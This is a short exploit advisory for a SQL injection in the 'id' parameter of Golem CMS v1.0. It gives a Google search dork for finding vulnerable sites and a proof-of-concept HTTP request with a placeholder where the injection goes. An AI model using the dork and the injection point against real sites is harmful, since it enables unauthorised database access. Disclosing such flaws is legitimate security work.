# Exploit Title: Golem [CMS] v1.0 - SQL Injection
# Google Dork: inurl:cms-admin
# Date: 2018 April 17
# Exploit Author: TukangSihir
# Vendor Homepage: http://www.spaziogrezzo.it/
# Version: 1.0
# Tested on: Ubuntu
1. Description
not validate or sanitize at the parameters "id", so attacker can do SQL-Injection vulnerablities, and attacker can see the database
#####POC#####
GET /it/eventi-dettaglio.php?id=[SQLi] HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: [target]
Cookie: displayCookieConsent=y; _ga=GA1.2.353727022.1523902983; _gid=GA1.2.999499184.1523902983; PHPSESSID=lps0dkpciu5pss5fubomah7116
Connection: close
Upgrade-Insecure-Requests: 1
#############